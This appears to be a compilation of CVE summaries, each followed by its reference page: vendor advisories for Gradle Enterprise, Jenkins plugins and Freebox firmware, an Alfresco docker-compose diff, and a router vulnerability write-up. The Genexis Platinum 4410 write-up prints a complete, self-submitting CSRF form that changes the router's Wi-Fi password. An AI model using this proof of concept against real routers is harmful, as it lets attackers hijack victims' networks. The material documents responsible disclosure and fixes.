CodeLathe FileCloud before 20.2.0.11915 allows username enumeration.

CVE-2020-26524: FileCloud Release Notes

Pagure before 5.6 allows XSS via the templates/blame.html blame view.

CVE-2019-11556: Changelog — pagure documentation

The Alfresco Reset Password add-on before version 1.2.0 relies on untrusted inputs in a security decision. Intruders can get admin's access to the system using the vulnerability in the project. Impacts all servers where this add-on is installed. The problem is fixed in version 1.2.0

@@ -0,0 +1,142 @@  
version: "2"  
services: alfresco-resetpassword: # image: alfresco/alfresco-content-repository-community:6.2.0-ga build: ./../alfresco-resetpassword environment: CATALINA\_OPTS: "\-agentlib:jdwp=transport=dt\_socket,server=y,suspend=n,address=0.0.0.0:8888" JAVA\_OPTS : " \-Ddb.driver=org.postgresql.Driver \-Ddb.username=alfresco \-Ddb.password=alfresco \-Ddb.url=jdbc:postgresql://postgres-resetpassword:5432/alfresco \-Dsolr.host=solr6-resetpassword \-Dsolr.port=8983 \-Dsolr.secureComms=none \-Dsolr.base.url=/solr \-Dindex.subsystem.name=solr6 \-Ddeployment.method=DOCKER\_COMPOSE \-Dcsrf.filter.enabled=false \-Dmessaging.subsystem.autoStart=false \-Dlocal.transform.service.enabled=true \-DlocalTransform.pdfrenderer.url=http://alfresco-pdf-renderer:8090/ \-DlocalTransform.imagemagick.url=http://imagemagick:8090/ \-DlocalTransform.libreoffice.url=http://libreoffice:8090/ \-DlocalTransform.tika.url=http://tika:8090/ \-DlocalTransform.misc.url=http://transform-misc:8090/ \-Dlegacy.transform.service.enabled=true \-Dalfresco-pdf-renderer.url=http://alfresco-pdf-renderer:8090/ \-Djodconverter.url=http://libreoffice:8090/ \-Dimg.url=http://imagemagick:8090/ \-Dtika.url=http://tika:8090/ \-Dtransform.misc.url=http://transform-misc:8090/ \-Xms1500m -Xmx1500m " ports: \- 8082:8080 #Browser port \- 5005:8888 \- 2121:2121 links: \- postgres-resetpassword volumes: \- alf\_data-resetpassword:/usr/local/tomcat/alf\_data \- ./../alfresco-resetpassword/\_lib:/usr/local/tomcat/webapps/alfresco/development/lib \- ./../alfresco-resetpassword/target/classes:/usr/local/tomcat/webapps/alfresco/development/classes \- ./../alfresco-resetpassword/context.xml:/usr/local/tomcat/webapps/alfresco/META-INF/context.xml  
alfresco-pdf-renderer: image: alfresco/alfresco-pdf-renderer:2.1.0 mem\_limit: 1g environment: JAVA\_OPTS: " -Xms256m -Xmx512m" expose: \- 8090  
imagemagick: image: alfresco/alfresco-imagemagick:2.1.0 mem\_limit: 1g environment: JAVA\_OPTS: " -Xms256m -Xmx512m" expose: \- 8090  
libreoffice: image: alfresco/alfresco-libreoffice:2.1.0 mem\_limit: 1g environment: JAVA\_OPTS: " -Xms256m -Xmx512m" expose: \- 8090  
tika: image: alfresco/alfresco-tika:2.1.0 mem\_limit: 1g environment: JAVA\_OPTS: " -Xms256m -Xmx512m" expose: \- 8090  
transform-misc: image: alfresco/alfresco-transform-misc:2.1.0 mem\_limit: 1g environment: JAVA\_OPTS: " -Xms256m -Xmx512m" expose: \- 8090  
  
share-resetpassword: # image: alfresco/alfresco-share:6.2.0 build: ./../share-resetpassword environment: \- REPO\_HOST=alfresco-resetpassword \- REPO\_PORT=8080 \- JAVA\_OPTS=-agentlib:jdwp=transport=dt\_socket,server=y,suspend=n,address=5006 ports: \- 8080:8080 \- 5006:5006 volumes: \- ./../share-resetpassword/\_lib:/usr/local/tomcat/webapps/share/development/lib \- ./../share-resetpassword/target/classes:/usr/local/tomcat/webapps/share/development/classes \- ./../share-resetpassword/context.xml:/usr/local/tomcat/webapps/share/META-INF/context.xml \- ./../share-resetpassword/src/main/resources/web:/usr/local/tomcat/webapps/share/development/web  
postgres-resetpassword: image: postgres:11.4 environment: \- POSTGRES\_PASSWORD=alfresco \- POSTGRES\_USER=alfresco \- POSTGRES\_DB=alfresco command: postgres -c max\_connections=300 -c log\_min\_messages=LOG ports: \- 5435:5432  
solr6-resetpassword: image: alfresco/alfresco-search-services:1.4.0 environment: #Solr needs to know how to register itself with Alfresco \- SOLR\_ALFRESCO\_HOST=alfresco-resetpassword \- SOLR\_ALFRESCO\_PORT=8080 #Alfresco needs to know how to call solr \- SOLR\_SOLR\_HOST=solr6-resetpassword \- SOLR\_SOLR\_PORT=8983 #Create the default alfresco and archive cores \- SOLR\_CREATE\_ALFRESCO\_DEFAULTS=alfresco,archive \- ALFRESCO\_SECURE\_COMMS=none ports: \- 8983  
activemq-resetpassword: image: alfresco/alfresco-activemq:5.15.8 ports: \- 8161 # Web Console \- 5672 # AMQP \- 61616 # OpenWire \- 61613 # STOMP volumes: alf\_data-resetpassword:

CVE-2020-15181: Merge remote-tracking branch 'remotes/origin/candidate' into release · FlexSolution/AlfrescoResetPassword@5927b96

An issue was discovered in Gradle Enterprise 2018.2 - 2020.2.4. The CSRF prevention token is stored in a request cookie that is not annotated as HttpOnly. An attacker with the ability to execute arbitrary code in a user's browser could impose an arbitrary value for this token, allowing them to perform cross-site request forgery.

All advisories**CSRF prevention token is overridable by user code**

**Affected product(s)**

*   Gradle Enterprise 2018.2 - 2020.2.4

**Severity**

High

**Published at**

2020-09-15

**Related CVE ID(s)**

*   CVE-2020-15776

**Description**

The CSRF prevention token is stored in a request cookie that is not annotated as HttpOnly. An attacker with the ability to execute arbitrary code in a user's browser could impose an arbitrary value for this token, allowing them to perform cross-site request forgery.

**Mitigation**

Upgrade to Gradle Enterprise 2020.2.5.

**Credit**

This issue was responsibly reported by Compass Security.

CVE-2020-15776: Gradle Enterprise - Security Advisories

An issue was discovered in Gradle Enterprise 2018.2 and Gradle Enterprise Build Cache Node 4.1. Cross-site transmission of cookie containing CSRF token allows remote attacker to bypass CSRF mitigation.

All advisories**Request cookies containing CSRF prevention token are not same-site restricted**

**Affected product(s)**

*   Gradle Enterprise 2018.2

**Severity**

Moderate

**Published at**

2020-09-15

**Related CVE ID(s)**

*   CVE-2020-15771

**Description**

Cross-site transmission of cookie containing CSRF token allows remote attacker to bypass CSRF mitigation.

**Mitigation**

Upgrade to Gradle Enterprise 2020.2.5.

**Credit**

This issue was responsibly reported by Compass Security.

CVE-2020-15771: Gradle Enterprise - Security Advisories

An issue was discovered in Gradle Enterprise before 2020.2.5. The cookie used to convey the CSRF prevention token is not annotated with the “secure” attribute, which allows an attacker with the ability to MITM plain HTTP requests to obtain it, if the user mistakenly uses a HTTP instead of HTTPS address to access the server. This cookie value could then be used to perform CSRF.

All advisories**CSRF prevention cookie is susceptible to capture by MITM on HTTP redirect**

**Affected product(s)**

*   Gradle Enterprise < 2020.2.5

**Severity**

Moderate

**Published at**

2020-09-15

**Related CVE ID(s)**

*   CVE-2020-15767

**Description**

The cookie used to convey the CSRF prevention token is not annotated with the “secure” attribute, which allows an attacker with the ability to MITM plain HTTP requests to obtain it, if the user mistakenly uses a HTTP instead of HTTPS address to access the server.

This cookie value could then be used to perform CSRF.

**Mitigation**

Upgrade to Gradle Enterprise 2020.2.5.

**Credit**

This issue was responsibly reported by Compass Security.

CVE-2020-15767: Gradle Enterprise - Security Advisories

A CSRF vulnerability in the UPnP MediaServer implementation in Freebox Server before 4.2.3.

**Mise à jour du Freebox Server (Révolution/mini/One/Delta/Pop) 4.2.3**

**Posté par:** | **Le** 5 août 2020 à 11:15 | **Catégorie:** Freebox Server, Mise à jour | Comments Off on Mise à jour du Freebox Server (Révolution/mini/One/Delta/Pop) 4.2.3

La mise à jour est disponible depuis le 05 aout 2020 à 11h00. Pour en profiter, veuillez redémarrer le Freebox Server.

La mise à jour apporte les changements suivants :

**Corrections**

*   Les graphes de débit affichent maintenant les débits supérieurs à 1Gbit/s (Freebox Pop)
*   Amélioration de la QOS en mode VDSL lorsque le débit upload est faible (Freebox Pop)
*   Correction du mode bridge (Freebox Pop)
*   Correction des déconnexions aléatoires non visibles sur l’historique des connexions (Freebox Révolution/Mini4k)
*   Pour les cartes Wifi utilisées en mode 160Mhz, en cas de détection de radar (DFS), la carte diminuera maintenant automatiquement la largeur de bande.
*   Correction d’un problème de stabilité sur le wifi N des Freebox Révolution/mini4k/One

\[Mise à jour 07/09/2020\]

Ce firmware corrige également les problèmes de sécurité suivants:

*   CVE-2020-24373, CSRF in UPnP MediaServer
*   CVE-2020-24375, DNS-rebinding in UPnP MediaServer
*   CVE-2020-24376, DNS-rebinding in UPnP IGD
*   CVE-2020-24377, DNS-rebinding in Freebox OS web interface
*   CVE-2020-24374, DNS-rebinding in Freebox HD web interface (firmware 1.5.29)

Merci à Gabriel Corona d’avoir identifié ces problèmes et suivi la procédure de divulgation responsable.

CVE-2020-24373: L'actualité de la Freebox » Blog Archive

A specific router allows changing the Wi-Fi password remotely. Genexis Platinum 4410 V2-1.28, a compact router generally used at homes and offices was found to be vulnerable to Broken Access Control and CSRF which could be combined to remotely change the WIFI access point’s password.

While testing the Genexis Platinum 4410 home router version 2.1 (software version P4410-V2-1.28), I was able to find that the router is vulnerable to Broken Access Control and CSRF.

**CVE ID:** CVE-2020-25015

****Summary****

Platinum 4410 is a compact router from Genexis that is commonly used at homes. Hardware version V2.1 – Software version P4410-V2-1.28 was found to be vulnerable to Broken Access Control and CSRF which could be combined to remotely change the WIFI access point’s password.

> Access control enforces policy such that users cannot act outside of their intended permissions. Failures typically lead to unauthorized information disclosure, modification or destruction of all data, or performing a business function outside of the limits of the user.
> 
> _—_ OWASP

For more information on CSRF, please visit this article.

**Impact**

An attacker can send the victim a link, which if he clicks while he is connected to the WIFI network established from the vulnerable router, the password of the WIFI access point will get changed via CSRF exploit. As the router is also vulnerable to Broken Access Control, the victim does not need to be logged in to the router’s web-based setup page (192.168.1.1), essentially making this a one-click hack.

**Vulnerability**

Ideally, this attack would be troublesome because for a CSRF attack to be successful, it requires the victim to be logged in to the application that is under the attack (in this case, the web-based setup page at 192.168.1.1) and most router setup pages ends user sessions automatically. Additionally, it is rarely that customers visit their router’s setup page as well. However, due to the broken access control vulnerability in the latest version of the firmware at the time of reporting, the request to change password could be sent by unauthenticated parties as well.

Thus combining the CSRF and Broken Access Control vulnerabilities on this version of the firmware, an attacker can create an HTML document with the following code and bait the user into submitting it.

    <html>
      <body>
      <script>history.pushState('', '', '/')</script>
        <form action="http://192.168.1.1/cgi-bin/net-wlan.asp" method="POST">
          <input type="hidden" name="wlEnbl" value="ON" />
          <input type="hidden" name="hwlKeys0" value="" />
          <input type="hidden" name="hwlKeys1" value="" />
          <input type="hidden" name="hwlKeys2" value="" />
          <input type="hidden" name="hwlKeys3" value="" />
          <input type="hidden" name="hwlgMode" value="9" />
          <input type="hidden" name="hwlAuthMode" value="WPAPSKWPA2PSK" />
          <input type="hidden" name="hwlEnbl" value="1" />
          <input type="hidden" name="hWPSMode" value="1" />
          <input type="hidden" name="henableSsid" value="1" />
          <input type="hidden" name="hwlHide" value="0" />
          <input type="hidden" name="isInWPSing" value="0" />
          <input type="hidden" name="WpsConfModeAll" value="7" />
          <input type="hidden" name="WpsConfModeNone" value="0" />
          <input type="hidden" name="hWpsStart" value="0" />
          <input type="hidden" name="isCUCSupport" value="0" />
          <input type="hidden" name="SSIDPre" value="N&#47;A" />
          <input type="hidden" name="bwControlhidden" value="0" />
          <input type="hidden" name="ht&#95;bw" value="1" />
          <input type="hidden" name="wlgMode" value="b&#44;g&#44;n" />
          <input type="hidden" name="wlChannel" value="0" />
          <input type="hidden" name="wlTxPwr" value="1" />
          <input type="hidden" name="wlSsidIdx" value="0" />
          <input type="hidden" name="SSID&#95;Flag" value="0" />
          <input type="hidden" name="wlSsid" value="JINSON" />
          <input type="hidden" name="wlMcs" value="33" />
          <input type="hidden" name="bwControl" value="1" />
          <input type="hidden" name="giControl" value="1" />
          <input type="hidden" name="enableSsid" value="on" />
          <input type="hidden" name="wlAssociateNum" value="32" />
          <input type="hidden" name="wlSecurMode" value="WPAand11i" />
          <input type="hidden" name="wlPreauth" value="off" />
          <input type="hidden" name="wlNetReauth" value="1" />
          <input type="hidden" name="wlWpaPsk" value="NEWPASSWORD" />
          <input type="hidden" name="cb&#95;enablshowpsw" value="on" />
          <input type="hidden" name="wlWpaGtkRekey" value="" />
          <input type="hidden" name="wlRadiusIPAddr" value="" />
          <input type="hidden" name="wlRadiusPort" value="" />
          <input type="hidden" name="wlRadiusKey" value="" />
          <input type="hidden" name="wlWpa" value="TKIPAES" />
          <input type="hidden" name="wlKeyBit" value="64" />
          <input type="hidden" name="wlKeys" value="" />
          <input type="hidden" name="wlKeys" value="" />
          <input type="hidden" name="wlKeys" value="" />
          <input type="hidden" name="wlKeys" value="" />
          <input type="hidden" name="WpsActive" value="0" />
          <input type="hidden" name="wpsmode" value="ap&#45;pbc" />
          <input type="hidden" name="pinvalue" value="" />
          <input type="hidden" name="Save&#95;Flag" value="1" />
          <input type="submit" value="Submit request" />
        </form>
         <script>
          document.forms[0].submit();
        </script>
      </body>
    </html>
    

As long as the victim is connected to the WiFi access point established by the affected router, the password of the access point would get changed as shown in the below video.

****Timeline****

*   Vulnerability reported to the Genexis team on August 28, 2020
*   Team confirmed firmware release containing fix on September 14, 2020

****Recommendation****

*   As per the Genexis team, customers should contact their ISP in order to get access to the latest firmware.
*   Use a more secure router if you are unable to upgrade the firmware.

**Reference**

*   https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-25015
*   https://nvd.nist.gov/vuln/detail/CVE-2020-25015

Tags: broken access control, CSRF, genexis, genexis platinum 4410, genexis routers, owasp, owasp top 10, router, vulnerability

**Jinson Varghese**

Jinson Varghese Behanan is an Information Security Analyst at Astra. Passionate about Cybersecurity from a young age, Jinson completed his Bachelor's degree in Computer Security from Northumbria University. When he isn’t glued to a computer screen, he spends his time reading InfoSec materials, playing basketball, learning French and traveling. You can follow him on Medium or visit his Website for more stories about the various Security Audits he does and the crazy vulnerabilities he finds.

CVE-2020-25015: Genexis Platinum 4410 Router - Broken Access Control, CSRF

Jenkins Radiator View Plugin 1.29 and earlier does not escape the full name of the jobs in tooltips, resulting in a stored cross-site scripting (XSS) vulnerability exploitable by attackers with Job/Configure permission.

This advisory announces vulnerabilities in the following Jenkins deliverables:

*   android-lint Plugin
*   Blue Ocean Plugin
*   chosen-views-tabbar Plugin
*   ClearCase Release Plugin
*   computer-queue-plugin Plugin
*   Copy data to workspace Plugin
*   Coverage/Complexity Scatter Plot Plugin
*   Custom Job Icon Plugin
*   Description Column Plugin
*   ElasTest Plugin
*   Email Extension Plugin
*   Health Advisor by CloudBees Plugin
*   Locked Files Report Plugin
*   Mailer Plugin
*   MongoDB Plugin
*   Perfecto Plugin
*   Pipeline Maven Integration Plugin
*   Radiator View Plugin
*   Selection tasks Plugin
*   Storable Configs Plugin
*   Validating String Parameter Plugin

**Descriptions****Missing hostname validation in Mailer Plugin**

**SECURITY-1813 / CVE-2020-2252**  
**Severity (CVSS):** Medium  
**Affected plugin: mailer**  
**Description:**

Mailer Plugin 1.32 and earlier does not perform hostname validation when connecting to the configured SMTP server. This lack of validation could be abused using a man-in-the-middle attack to intercept these connections.

Mailer Plugin 1.32.1 validates the SMTP hostname when connecting via TLS by default. In Mailer Plugin 1.32 and earlier, administrators can set the Java system property mail.smtp.ssl.checkserveridentity to true on startup to enable this protection.

In case of problems, this protection can be disabled again by setting the Java system property mail.smtp.ssl.checkserveridentity to false on startup.

**Missing hostname validation in Email Extension Plugin**

**SECURITY-1851 / CVE-2020-2253**  
**Severity (CVSS):** Medium  
**Affected plugin: email-ext**  
**Description:**

Email Extension Plugin 2.75 and earlier does not perform hostname validation when connecting to the configured SMTP server. This lack of validation could be abused using a man-in-the-middle attack to intercept these connections.

Email Extension Plugin 2.76 validates the SMTP hostname when connecting via TLS by default. In Email Extension Plugin 2.75 and earlier, administrators can set the Java system property mail.smtp.ssl.checkserveridentity to true on startup to enable this protection. Alternatively, this protection can be enabled (or disabled in the new version) via the 'Advanced Email Properties' field in the plugin’s configuration in Configure System.

In case of problems, this protection can be disabled again by setting mail.smtp.ssl.checkserveridentity to false using either method.

**Path traversal vulnerability in Blue Ocean Plugin**

**SECURITY-1956 / CVE-2020-2254**  
**Severity (CVSS):** Medium  
**Affected plugin: blueocean**  
**Description:**

Blue Ocean Plugin 1.23.2 and earlier provides an undocumented feature flag, blueocean.features.GIT_READ_SAVE_TYPE, that when set to the value clone allows an attacker with Item/Configure or Item/Create permission to read arbitrary files on the Jenkins controller file system.

Blue Ocean Plugin 1.23.3 no longer includes this feature and redirects existing usage to a safer alternative.

**Missing permission check in Blue Ocean Plugin**

**SECURITY-1961 / CVE-2020-2255**  
**Severity (CVSS):** Medium  
**Affected plugin: blueocean**  
**Description:**

**Updated 2020-09-16:** _This entry previously misidentified the problematic behavior. The HTTP request itself is legitimate, but only authorized users should be able to perform it._

Blue Ocean Plugin 1.23.2 and earlier does not perform permission checks in several HTTP endpoints implementing connection tests.

This allows attackers with Overall/Read permission to connect to an attacker-specified URL.

Blue Ocean Plugin 1.23.3 requires Item/Create permission to perform these connection tests.

**Stored XSS vulnerability in upstream cause in Pipeline Maven Integration Plugin**

**SECURITY-1976 / CVE-2020-2256**  
**Severity (CVSS):** High  
**Affected plugin: pipeline-maven**  
**Description:**

Pipeline Maven Integration Plugin 3.9.2 and earlier does not escape the upstream job’s display name shown as part of a build cause.

This results in a stored cross-site scripting (XSS) vulnerability exploitable by attackers with Job/Configure permission.

Pipeline Maven Integration Plugin 3.9.3 escapes upstream job names in build causes.

**Stored XSS vulnerability in Validating String Parameter Plugin**

**SECURITY-1935 / CVE-2020-2257**  
**Severity (CVSS):** High  
**Affected plugin: validating-string-parameter**  
**Description:**

Validating String Parameter Plugin 2.4 and earlier does not escape regular expressions in tooltips. Additionally, Validating String Parameter Plugin 2.4 does not escape parameter names and parameter descriptions.

This results in a stored cross-site scripting (XSS) vulnerability exploitable by attackers with Job/Configure permission.

Validating String Parameter Plugin 2.5 escapes regular expressions in tooltips and parameter names. Parameter descriptions are rendered using the configured markup formatter.

**Incorrect permission check in Health Advisor by CloudBees Plugin**

**SECURITY-1998 / CVE-2020-2258**  
**Severity (CVSS):** Medium  
**Affected plugin: cloudbees-jenkins-advisor**  
**Description:**

Health Advisor by CloudBees Plugin 3.2.0 and earlier does not correctly perform a permission check in an HTTP endpoint.

This allows attackers with Overall/Read permission to view an administrative configuration page.

Health Advisor by CloudBees Plugin 3.2.1 requires Overall/Administer to view its administrative configuration page.

**Stored XSS vulnerability in computer-queue-plugin Plugin**

**SECURITY-1912 / CVE-2020-2259**  
**Severity (CVSS):** High  
**Affected plugin: computer-queue-plugin**  
**Description:**

computer-queue-plugin Plugin 1.5 and earlier does not escape the agent name in tooltips.

This results in a stored cross-site scripting (XSS) vulnerability exploitable by attackers with Agent/Configure permission.

computer-queue-plugin Plugin 1.6 escapes the agent name in tooltips.

**Missing permission check in Perfecto Plugin**

**SECURITY-1979 / CVE-2020-2260**  
**Severity (CVSS):** Medium  
**Affected plugin: perfecto**  
**Description:**

Perfecto Plugin 1.17 and earlier does not perform a permission check in a method implementing a connection test.

This allows attackers with Overall/Read permission to connect to an attacker-specified HTTP URL using attacker-specified username and password.

Perfecto Plugin 1.18 requires Overall/Administer permission to perform a connection test.

**OS command execution vulnerability in Perfecto Plugin**

**SECURITY-1980 / CVE-2020-2261**  
**Severity (CVSS):** High  
**Affected plugin: perfecto**  
**Description:**

Perfecto Plugin allows specifying Perfecto Connect Path and Perfecto Connect File Name in job configurations.

This command is executed on the Jenkins controller in Perfecto Plugin 1.17 and earlier, allowing attackers with Job/Configure permission to run arbitrary commands on the Jenkins controller.

Perfecto Plugin 1.18 executes the specified commands on the agent the build is running on.

**Stored XSS vulnerability in android-lint Plugin**

**SECURITY-1908 / CVE-2020-2262**  
**Severity (CVSS):** High  
**Affected plugin: android-lint**  
**Description:**

android-lint Plugin 2.6 and earlier does not escape the annotation message in tooltips.

This results in a stored cross-site scripting (XSS) vulnerability exploitable by attackers able to provide report files to the 'Publish Android Lint results' post-build step.

As of publication of this advisory, there is no fix.

**Stored XSS vulnerability in Radiator View Plugin**

**SECURITY-1927 / CVE-2020-2263**  
**Severity (CVSS):** High  
**Affected plugin: radiatorviewplugin**  
**Description:**

Radiator View Plugin 1.29 and earlier does not escape the full name of the jobs in tooltips.

This results in a stored cross-site scripting (XSS) vulnerability exploitable by attackers with Job/Configure permission.

As of publication of this advisory, there is no fix.

**Stored XSS vulnerability in Custom Job Icon Plugin**

**SECURITY-1914 / CVE-2020-2264**  
**Severity (CVSS):** High  
**Affected plugin: custom-job-icon**  
**Description:**

Custom Job Icon Plugin 0.2 and earlier does not escape the job descriptions in tooltips.

This results in a stored cross-site scripting (XSS) vulnerability exploitable by attackers with Job/Configure permission.

As of publication of this advisory, there is no fix.

**Stored XSS vulnerability in Coverage/Complexity Scatter Plot Plugin**

**SECURITY-1913 / CVE-2020-2265**  
**Severity (CVSS):** High  
**Affected plugin: covcomplplot**  
**Description:**

Coverage/Complexity Scatter Plot Plugin 1.1.1 and earlier does not escape the method information in tooltips.

This results in a stored cross-site scripting (XSS) vulnerability exploitable by attackers able to provide report files to the 'Publish Coverage / Complexity Scatter Plot' post-build step.

As of publication of this advisory, there is no fix.

**Stored XSS vulnerability in Description Column Plugin**

**SECURITY-1916 / CVE-2020-2266**  
**Severity (CVSS):** High  
**Affected plugin: description-column-plugin**  
**Description:**

Description Column Plugin 1.3 and earlier does not escape the job description in the column tooltips.

This results in a stored cross-site scripting (XSS) vulnerability exploitable by attackers with Job/Configure permission.

As of publication of this advisory, there is no fix.

**CSRF vulnerability and missing permission checks in MongoDB Plugin**

**SECURITY-1904 / CVE-2020-2267 (missing permission check), CVE-2020-2268 (CSRF)**  
**Severity (CVSS):** Medium  
**Affected plugin: mongodb**  
**Description:**

MongoDB Plugin 1.3 and earlier does not perform permission checks in methods implementing form validation.

This allows attackers with Overall/Read permission to gain access to some metadata of any arbitrary files on the Jenkins controller.

Additionally, these form validation methods do not require POST requests, resulting in a cross-site request forgery (CSRF) vulnerability.

As of publication of this advisory, there is no fix.

**Stored XSS vulnerability in chosen-views-tabbar Plugin**

**SECURITY-1869 / CVE-2020-2269**  
**Severity (CVSS):** High  
**Affected plugin: chosen-views-tabbar**  
**Description:**

chosen-views-tabbar Plugin 1.2 and earlier does not escape view names in the dropdown to select views.

This results in a stored cross-site scripting (XSS) vulnerability exploitable by attackers with the ability to configure views.

As of publication of this advisory, there is no fix.

**Stored XSS vulnerability in ClearCase Release Plugin**

**SECURITY-1911 / CVE-2020-2270**  
**Severity (CVSS):** High  
**Affected plugin: clearcase-release**  
**Description:**

ClearCase Release Plugin 0.3 and earlier does not escape the composite baseline in badge tooltip.

This results in a stored cross-site scripting (XSS) vulnerability exploitable by attackers with Job/Configure permission.

As of publication of this advisory, there is no fix.

**Stored XSS vulnerability in Locked Files Report Plugin**

**SECURITY-1921 / CVE-2020-2271**  
**Severity (CVSS):** High  
**Affected plugin: locked-files-report**  
**Description:**

Locked Files Report Plugin 1.6 and earlier does not escape locked files' names in tooltips.

This results in a stored cross-site scripting (XSS) vulnerability exploitable by attackers with Job/Configure permission.

As of publication of this advisory, there is no fix.

**CSRF vulnerability and missing permission checks in ElasTest Plugin**

**SECURITY-1903 / CVE-2020-2272 (missing permission check), CVE-2020-2273 (CSRF)**  
**Severity (CVSS):** Medium  
**Affected plugin: elastest**  
**Description:**

ElasTest Plugin 1.2.1 and earlier does not perform a permission check in a method implementing form validation.

This allows attackers with Overall/Read permission to connect to an attacker-specified URL using attacker-specified credentials.

Additionally, this form validation method does not require POST requests, resulting in a cross-site request forgery (CSRF) vulnerability.

As of publication of this advisory, there is no fix.

**Passwords stored in plain text by ElasTest Plugin**

**SECURITY-2014 / CVE-2020-2274**  
**Severity (CVSS):** Low  
**Affected plugin: elastest**  
**Description:**

ElasTest Plugin 1.2.1 and earlier stores its server password in plain text in the global configuration file jenkins.plugins.elastest.ElasTestInstallation.xml. This password can be viewed by users with access to the Jenkins controller file system.

As of publication of this advisory, there is no fix.

**Arbitrary file read vulnerability in Copy data to workspace Plugin**

**SECURITY-1966 / CVE-2020-2275**  
**Severity (CVSS):** Medium  
**Affected plugin: copy-data-to-workspace-plugin**  
**Description:**

Copy data to workspace Plugin allows users to copy files from the Jenkins controller to job workspaces.

Copy data to workspace Plugin 1.0 and earlier does not limit which directories can be copied. This allows attackers with Job/Configure permission to read arbitrary files on the Jenkins controller.

As of publication of this advisory, there is no fix.

**System command execution vulnerability in Selection tasks Plugin**

**SECURITY-1967 / CVE-2020-2276**  
**Severity (CVSS):** High  
**Affected plugin: selection-tasks-plugin**  
**Description:**

Selection tasks Plugin implements a job parameter that dynamically generates possible values from the output of a program. The path to that program is specified as part of the parameter configuration.

Selection tasks Plugin 1.0 and earlier executes this user-specified program on the Jenkins controller. This allows attackers with Job/Configure permission to execute an arbitrary system command on the Jenkins controller as the OS user that the Jenkins process is running as.

As of publication of this advisory, there is no fix.

**Arbitrary file read vulnerability in Storable Configs Plugin**

**SECURITY-1968 (1) / CVE-2020-2277**  
**Severity (CVSS):** Medium  
**Affected plugin: storable-configs-plugin**  
**Description:**

Storable Configs Plugin 1.0 and earlier allows users with Job/Read permission to read arbitrary files on the Jenkins controller.

As of publication of this advisory, there is no fix.

**Arbitrary file write vulnerability in Storable Configs Plugin**

**SECURITY-1968 (2) / CVE-2020-2278**  
**Severity (CVSS):** Medium  
**Affected plugin: storable-configs-plugin**  
**Description:**

Storable Configs Plugin allows storing copies of a job’s config.xml file on the Jenkins controller with a user-specified file name.

Storable Configs Plugin 1.0 and earlier does not restrict the user-specified file name, except that a .xml suffix is added if it’s not already present. This allows attackers with Job/Configure permission to replace any other .xml file on the Jenkins controller with the job’s config.xml file’s content.

As of publication of this advisory, there is no fix.

**Severity**

*   SECURITY-1813: Medium
*   SECURITY-1851: Medium
*   SECURITY-1869: High
*   SECURITY-1903: Medium
*   SECURITY-1904: Medium
*   SECURITY-1908: High
*   SECURITY-1911: High
*   SECURITY-1912: High
*   SECURITY-1913: High
*   SECURITY-1914: High
*   SECURITY-1916: High
*   SECURITY-1921: High
*   SECURITY-1927: High
*   SECURITY-1935: High
*   SECURITY-1956: Medium
*   SECURITY-1961: Medium
*   SECURITY-1966: Medium
*   SECURITY-1967: High
*   SECURITY-1968 (1): Medium
*   SECURITY-1968 (2): Medium
*   SECURITY-1976: High
*   SECURITY-1979: Medium
*   SECURITY-1980: High
*   SECURITY-1998: Medium
*   SECURITY-2014: Low

**Affected Versions**

*   **android-lint Plugin** up to and including 2.6
*   **Blue Ocean Plugin** up to and including 1.23.2
*   **chosen-views-tabbar Plugin** up to and including 1.2
*   **ClearCase Release Plugin** up to and including 0.3
*   **computer-queue-plugin Plugin** up to and including 1.5
*   **Copy data to workspace Plugin** up to and including 1.0
*   **Coverage/Complexity Scatter Plot Plugin** up to and including 1.1.1
*   **Custom Job Icon Plugin** up to and including 0.2
*   **Description Column Plugin** up to and including 1.3
*   **ElasTest Plugin** up to and including 1.2.1
*   **Email Extension Plugin** up to and including 2.75
*   **Health Advisor by CloudBees Plugin** up to and including 3.2.0
*   **Locked Files Report Plugin** up to and including 1.6
*   **Mailer Plugin** up to and including 1.32
*   **MongoDB Plugin** up to and including 1.3
*   **Perfecto Plugin** up to and including 1.17
*   **Pipeline Maven Integration Plugin** up to and including 3.9.2
*   **Radiator View Plugin** up to and including 1.29
*   **Selection tasks Plugin** up to and including 1.0
*   **Storable Configs Plugin** up to and including 1.0
*   **Validating String Parameter Plugin** up to and including 2.4

**Fix**

*   **Blue Ocean Plugin** should be updated to version 1.23.3
*   **computer-queue-plugin Plugin** should be updated to version 1.6
*   **Email Extension Plugin** should be updated to version 2.76
*   **Health Advisor by CloudBees Plugin** should be updated to version 3.2.1
*   **Mailer Plugin** should be updated to version 1.32.1
*   **Perfecto Plugin** should be updated to version 1.18
*   **Pipeline Maven Integration Plugin** should be updated to version 3.9.3
*   **Validating String Parameter Plugin** should be updated to version 2.5

These versions include fixes to the vulnerabilities described above. All prior versions are considered to be affected by these vulnerabilities unless otherwise indicated.

As of publication of this advisory, no fixes are available for the following plugins:

*   android-lint Plugin
*   chosen-views-tabbar Plugin
*   ClearCase Release Plugin
*   Copy data to workspace Plugin
*   Coverage/Complexity Scatter Plot Plugin
*   Custom Job Icon Plugin
*   Description Column Plugin
*   ElasTest Plugin
*   Locked Files Report Plugin
*   MongoDB Plugin
*   Radiator View Plugin
*   Selection tasks Plugin
*   Storable Configs Plugin

Learn why we announce these issues.

**Credit**

The Jenkins project would like to thank the reporters for discovering and reporting these vulnerabilities:

*   **Daniel Beck, CloudBees, Inc.** for SECURITY-1966, SECURITY-1967, SECURITY-1968 (1), SECURITY-1968 (2), SECURITY-1976
*   **Jinchen Sheng, Ant Security FG Lab.** for SECURITY-1956, SECURITY-1961
*   **Matt Sicker, CloudBees, Inc.** for SECURITY-1998
*   **Peter Stöckli (via Github Security Lab)** for SECURITY-1813
*   **Wadeck Follonier, CloudBees, Inc.** for SECURITY-1869, SECURITY-1903, SECURITY-1904, SECURITY-1908, SECURITY-1911, SECURITY-1912, SECURITY-1913, SECURITY-1914, SECURITY-1916, SECURITY-1921, SECURITY-1927, SECURITY-2014
*   **Wadeck Follonier, CloudBees, Inc. and Daniel Beck, CloudBees, Inc.** for SECURITY-1935

CVE-2020-2263: Jenkins Security Advisory 2020-09-16

Jenkins Android Lint Plugin 2.6 and earlier does not escape the annotation message in tooltips, resulting in a stored cross-site scripting (XSS) vulnerability exploitable by attackers able to provide report files to the plugin's post-build step.

Tag

#csrf